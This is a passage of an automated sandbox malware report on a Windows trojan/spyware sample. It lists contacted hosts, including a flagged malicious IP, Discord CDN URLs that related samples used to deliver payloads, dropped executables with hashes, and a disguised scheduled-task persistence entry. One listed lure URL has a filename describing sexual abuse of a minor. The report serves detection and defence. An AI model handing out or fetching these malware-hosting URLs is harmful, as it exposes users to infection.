                                                                                                        http://tempuri.org/Entity/Id17file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://tempuri.org/Entity/Id18file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://tempuri.org/Entity/Id5Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://tempuri.org/Entity/Id19file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsfile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id10Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Renewfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id8Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://ocsp.sectigo.com0file.exe, 00000000.00000002.416227735.000000000344F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416247086.0000000003453000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416272866.0000000003466000.00000004.00000800.00020000.00000000.sdmp, Setup.exe.0.dr, oobeldr.exe.1.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentityfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/soap/envelope/file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://search.yahoo.com?fr=crmas_sfpffile.exe, 00000000.00000002.439789078.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.437460819.000000000447A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.432707724.0000000004363000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438747488.000000000458E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trustfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Entity/Id23Responsefile.exe, 00000000.00000002.415504555.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cdn.discordapp.com4file.exe, 00000000.00000002.416056486.0000000003423000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/06/addressingexfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      37.139.128.203
                                                                                                                                      unknownGermany
                                                                                                                                      10753LVLT-10753UStrue
                                                                                                                                      162.159.133.233
                                                                                                                                      cdn.discordapp.comUnited States
                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                      Analysis ID:746784
                                                                                                                                      Start date and time:2022-11-15 18:52:54 +01:00
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 8m 41s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Sample file name:file.exe
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                      Number of analysed new started processes analysed:10
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • HDC enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@10/3@1/2
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                      HDC Information:Failed
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                      • Number of executed functions: 7
                                                                                                                                      • Number of non-executed functions: 1
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • VT rate limit hit for: file.exe
                                                                                                                                      TimeTypeDescription
                                                                                                                                      18:54:32API Interceptor63x Sleep call for process: file.exe modified
                                                                                                                                      18:54:55Task SchedulerRun new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      37.139.128.203file.exeGet hashmaliciousBrowse
                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                          162.159.133.233DHL_SHIPMENTS.exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/1012640888754819173/1012643262537928734/DHL_SHIPMENTS_Olorqccl.bmp
                                                                                                                                          SecuriteInfo.com.W32.FakeDoc.CY.genEldorado.18918.exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/956928735397965906/1006148111393116200/yXfZJqhIAtCWEPINOAX189.thn
                                                                                                                                          64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                                                                                                          PO - Drawings And Specifications Sheet_pdf.scr.exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
                                                                                                                                          BFSdrqaAvS.exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/878034206570209333/908436663947124756/slhost.exe
                                                                                                                                          GR01DtRd0N.exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/575791168713916457/896907138390192158/ETH2.exe
                                                                                                                                          update[1].exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/870656611562180611/873962758427783228/4401fbad77d12fbc.dll
                                                                                                                                          trinitymediaorder-po140521.docGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/843047034843955224/843047170223243314/NioR5xJ1XC9a9v2.exe
                                                                                                                                          NeworderWJO-002,pdf.exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/841906355832750103/842664739850944512/zBdd3DFJml9UrbJ.exe
                                                                                                                                          proforma invoice No. 42037,pdf.exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/809311531652087809/839379299009298442/Log_snake.exe
                                                                                                                                          Proforma adjunta N#U00ba 42037,pdf.exeGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/809311531652087809/839093777200971776/snake_crypted.exe
                                                                                                                                          Bon_Commande.BC106823.1602202.docGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/801091101888741379/818969220003790912/fodx.exe
                                                                                                                                          PO81105083.xlsxGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/801449801975726095/801450821929009152/Purchase_Order.exe
                                                                                                                                          Final documents.docGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                                                                                                                          009845673.docGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                                                                                                                          bPT6aeEo8O.rtfGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/785404703725977620/785404954315194398/buildkelly.exe
                                                                                                                                          00094321 Order.docGet hashmaliciousBrowse
                                                                                                                                          • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          cdn.discordapp.comThunderbird Setup 102.3.0.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.135.233
                                                                                                                                          Thunderbird Setup 102.3.0.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.135.233
                                                                                                                                          Thunderbird Setup 102.3.0.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.130.233
                                                                                                                                          Thunderbird Setup 102.3.0.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          https://cdn.discordapp.com/attachments/1038170795383455776/1039991902663086191/first_time_schoolgirl_near_the_park_torn_vagina_hidden_filming.ZIPGet hashmaliciousBrowse
                                                                                                                                          • 162.159.135.233
                                                                                                                                          wz24aOcCIe.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.130.233
                                                                                                                                          E-dekont_20221411_001 pdf.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          Software.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.134.233
                                                                                                                                          sv0ouBDN6u.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.134.233
                                                                                                                                          sv0ouBDN6u.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.135.233
                                                                                                                                          5ML28uI8oy.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.134.233
                                                                                                                                          pEDMpHSYn3.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          RfUcGPvrsd.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.129.233
                                                                                                                                          WindowsCom.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.134.233
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          order details.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.130.233
                                                                                                                                          SecurityHealthService.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          WindowShellExperince.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.134.233
                                                                                                                                          SystemGuardRuntime.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.129.233
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          LVLT-10753USfile.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.218
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          Proforma Invoice .xlsmGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.65
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.218
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.218
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.218
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.218
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.218
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.218
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.218
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 185.246.220.218
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.56.146.194
                                                                                                                                          CLOUDFLARENETUSRevisedCD_725757097.htmlGet hashmaliciousBrowse
                                                                                                                                          • 104.18.10.207
                                                                                                                                          RevisedCD_017034210.htmlGet hashmaliciousBrowse
                                                                                                                                          • 104.18.11.207
                                                                                                                                          dekont.exeGet hashmaliciousBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          https://hollabaugh-my.sharepoint.com/:o:/g/personal/cmitchell_hbarep_com/Eo9KB7unx6dJiaxqkHOo-AQBrSfA1fCnVNi7gLEPeBsU_A?e=5%3awxP7Mo&at=9Get hashmaliciousBrowse
                                                                                                                                          • 104.18.18.132
                                                                                                                                          kURi8Ephk5.exeGet hashmaliciousBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          15 November, 2022155943 PM.htmlGet hashmaliciousBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          http://health-and-skincare.com/?e=9726540706f696e746c6f6d612e656475Get hashmaliciousBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          Deckles.exeGet hashmaliciousBrowse
                                                                                                                                          • 172.67.214.163
                                                                                                                                          Invoice-404657.htmGet hashmaliciousBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          RevisedCD_516439610.htmlGet hashmaliciousBrowse
                                                                                                                                          • 104.18.11.207
                                                                                                                                          RevisedCD_516439610.htmlGet hashmaliciousBrowse
                                                                                                                                          • 104.18.10.207
                                                                                                                                          https://xbigr.mesebun.xyz/?rxm=96a2NvbGxpbnNAZGVyaWNrZGVybWF0b2xvZ3kuY29tGet hashmaliciousBrowse
                                                                                                                                          • 104.16.243.78
                                                                                                                                          RevisedCD_516439610.htmlGet hashmaliciousBrowse
                                                                                                                                          • 104.18.10.207
                                                                                                                                          NFEP-CONFIDENTIALITY AGREEMENT(NDA).exeGet hashmaliciousBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          Joseluis.garcia-Booking-Notificacion-desde-Juntadeandalucia-9KhEEdSR.htmGet hashmaliciousBrowse
                                                                                                                                          • 104.26.9.91
                                                                                                                                          Payment Confirmation INV-02764_14112022.htmGet hashmaliciousBrowse
                                                                                                                                          • 104.18.10.207
                                                                                                                                          factura 1722 pdf.exeGet hashmaliciousBrowse
                                                                                                                                          • 104.21.15.139
                                                                                                                                          Kapsejladsers (2).exeGet hashmaliciousBrowse
                                                                                                                                          • 172.67.175.40
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 104.21.77.214
                                                                                                                                          https://duering.com/aaa/#anne.je-mari@aftal.comGet hashmaliciousBrowse
                                                                                                                                          • 104.18.11.207
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0ehesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          Qoute for 04261LOMO-01418-LALIZAS UAE.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          New Project Business Plan Budget - Murad (2).exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          https://hollabaugh-my.sharepoint.com/:o:/g/personal/cmitchell_hbarep_com/Eo9KB7unx6dJiaxqkHOo-AQBrSfA1fCnVNi7gLEPeBsU_A?e=5%3awxP7Mo&at=9Get hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          New Project Business Plan Budget - Murad (2).exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          LSD0#02377.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          NZPXjDNYB3.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          SecuriteInfo.com.Trojan.PackedNET.1672.32057.32646.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          Thunderbird Setup 102.3.0.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          JvA1tLzZ7I.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          Thunderbird Setup 102.3.0.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          OzRcAXBesF.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          Faktura proforma nr 2621.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          3Bic2BtJXy.imgGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          Thunderbird Setup 102.3.0.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          Thunderbird Setup 102.3.0.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          Rw8sXJOmAt.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          XLTKR22090546.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          Bank Slip.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.159.133.233
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          C:\Users\user\AppData\Local\Temp\Setup.exefile.exeGet hashmaliciousBrowse
                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exefile.exeGet hashmaliciousBrowse
                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2843
                                                                                                                                                  Entropy (8bit):5.3371553026862095
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKAHKx1V:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxo
                                                                                                                                                  MD5:AA480F97CE07B9F7A0B038BD06505712
                                                                                                                                                  SHA1:0D7E42D0733A18A4C48B83EBBC68575925B0CD69
                                                                                                                                                  SHA-256:433F8C545F788D4F901AAD7B70F63700BD6861A1ABE32FAE7C8FD08AE29004BD
                                                                                                                                                  SHA-512:9A3AAEF350767D68BD455F50272BB942A860D3712C831C99896B9814C1733198321B3422D7E411974C56D71DA064716E354BAC0963DFB1D9A786612897A2A4CF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5490488
                                                                                                                                                  Entropy (8bit):7.970510610511451
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:z5E5IoBr0SdozMevlC5J0xTSdR7QISNVVhiiXk04QVKLg+5yG:z099ozMedC56SdR7QISNdk04JLp5yG
                                                                                                                                                  MD5:BCBB46256A4AF7B5509B2924BE449BC3
                                                                                                                                                  SHA1:1692917C482954C43A5B0127FC1B4C939FE7CBD2
                                                                                                                                                  SHA-256:F7BED46FE83995D9A4EFF5E9BF41C26E0721BCCED7EF05A47284BB59F44B274E
                                                                                                                                                  SHA-512:4C87F101FFEAF0A6692E2ADB98E83713A68A5AA8BFE83B5C6EF19B787631EB19B707C4CD8935E8EB0770154DD0E92389C61C657C36FC2D6BA62E903B2BB6B450
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.a.....................<........}......0....@.......................... ......4.T...@.................................?P..P....`..,.............S.8........................................................................................... ............................ ..` .....0......................@..@.data...`....@......................@... .....P......................`..` T...........................@..B V$... ...&..................@..@.idata.......P......................@....rsrc........`......................@..@.themida..d.........................`....boot....,<...}..,<.................`..`................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Setup.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5490488
                                                                                                                                                  Entropy (8bit):7.970510610511451
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:z5E5IoBr0SdozMevlC5J0xTSdR7QISNVVhiiXk04QVKLg+5yG:z099ozMedC56SdR7QISNdk04JLp5yG
                                                                                                                                                  MD5:BCBB46256A4AF7B5509B2924BE449BC3
                                                                                                                                                  SHA1:1692917C482954C43A5B0127FC1B4C939FE7CBD2
                                                                                                                                                  SHA-256:F7BED46FE83995D9A4EFF5E9BF41C26E0721BCCED7EF05A47284BB59F44B274E
                                                                                                                                                  SHA-512:4C87F101FFEAF0A6692E2ADB98E83713A68A5AA8BFE83B5C6EF19B787631EB19B707C4CD8935E8EB0770154DD0E92389C61C657C36FC2D6BA62E903B2BB6B450
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.a.....................<........}......0....@.......................... ......4.T...@.................................?P..P....`..,.............S.8........................................................................................... ............................ ..` .....0......................@..@.data...`....@......................@... .....P......................`..` T...........................@..B V$... ...&..................@..@.idata.......P......................@....rsrc........`......................@..@.themida..d.........................`....boot....,<...}..,<.................`..`................................................................................................................................................................................................................................
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Entropy (8bit):5.845667026170472
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                  File name:file.exe
                                                                                                                                                  File size:140288
                                                                                                                                                  MD5:d8fa5ec2e689dfbc2559ef3a5cb69ca2
                                                                                                                                                  SHA1:c21dd2d112d69f52318dbef8bdeea892e09c7d19
                                                                                                                                                  SHA256:9aecf1abe46d70a02d17800dbe3a8bda2f72f87456abb0dda69c7f7920cddb60
                                                                                                                                                  SHA512:860d3ce9c0f0dc421773b09f54b47cc42faa0d8d702fb2fb901c0d191a6babde1b8d3eb339bb947c951574cd8ae3e3fb4d1bf5c1a8fa58323fea5f4ae7c163da
                                                                                                                                                  SSDEEP:3072:aYO/ZMTFjr+sIjLHydBupA8vWFjyRPkhCSSw6:aYMZMBjr3I/0BYBpkh
                                                                                                                                                  TLSH:C7D36A1827DCEE11D6BF4B79A8B0615187F0E453FA52F32F4AD554EE0E62B80CE116B2
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............!... ...@....@.. ....................................@................................
                                                                                                                                                  Icon Hash:5161454747646c1b
                                                                                                                                                  Entrypoint:0x422186
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
